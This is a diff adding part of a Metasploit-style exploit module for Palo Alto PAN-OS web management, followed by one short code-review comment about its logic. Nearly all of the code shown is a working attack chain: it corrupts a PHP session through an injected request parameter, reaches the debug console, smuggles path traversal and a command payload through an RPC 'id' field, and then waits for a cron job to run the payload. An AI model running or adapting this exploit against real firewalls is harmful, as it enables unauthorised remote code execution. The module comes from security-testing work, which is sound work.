modules/exploits/linux/http/panos_readsessionvars.rb

```diff
@@ -0,0 +1,203 @@
+    target_directory = base_directory + command_payload
+
+    if target_directory.length > 255
+      print_error("The selected payload or options resulted in an encoded command that is too long (255+ bytes)")
+      return
+    end
+
+
+    print_status("Creating our corrupted session ID...")
+
+    # Obtain a session cookie linked to a corrupted session file. A raw request
+    # is needed to prevent encoding of the parameters injected into the session
+    res = send_request_raw(
+      'method' => 'GET',
+      'uri'    => "/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\";"
+    )
+    unless res && res.body.to_s.index('@start@Success@end@')
+      print_error("Unexpected response when creating the corrupted session cookie: #{res.code} #{res.message}")
+      return
+    end
+
+    cookies = res.get_cookies
+    unless cookies =~ /PHPSESSID=([a-fA-F0-9]+)/
+      print_error("Unexpected cookie response when creating the corrupted session cookie: #{res.code} #{res.message} #{cookies}")
+      return
+    end
+
+    print_status("Verifying that we can access the debug console with our corrupted session ID...")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/php/utils/debug.php',
+      'cookie' => cookies,
+    )
+    unless res && res.body.to_s.index('Debug Console')
+      print_error("Unexpected response when validating the corrupted session cookie: #{res.code} #{res.message}")
+      return
+    end
+
+    create_directory_json = JSON.dump({
+      "action" => "PanDirect",
+      "method" => "execute",
+      "data"   => [
+        "07c5807d0d927dcd0980f86024e5208b",
+        "Administrator.get",
+        {
+          "changeMyPassword" => true,
+          "template"         => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
+          "id"               => "admin']\" async-mode='yes' refresh='yes' cookie='../../../../../..#{target_directory}'/>\x00"
+        }
+      ],
+      "type"   => "rpc",
+      "tid"    => 713
+    })
+
+    print_status("Calling Administrator.get to create directory under #{base_directory}...")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => '/php/utils/router.php/Administrator.get',
+      'cookie' => cookies,
+      'ctype'  => "application/json",
+      'data'   => create_directory_json
+    )
+    unless res and res.body.to_s =~ /Async request enqueued/
+      print_error("Unexpected response when calling Administrator.get method: #{res.code} #{res.message}")
+      return
+    end
+
+    print_status("Waiting up to 20 minutes for the cronjob to fire and execute...")
+    expiry = Time.at(Time.now.to_i + (60*20)).to_i
+    last_notice = 0
+    while expiry > Time.now.to_i && ! session_created?
+      if last_notice + 30 < Time.now.to_i
+        print_status("Waiting for a session, #{expiry - Time.now.to_i} seconds left...")
+        last_notice = Time.now.to_i
+      end
+      sleep(1)
+    end
+
+    unless session_created?
```

Comment:
This is a little confusing with the `else`. Mind rewriting it to positive logic?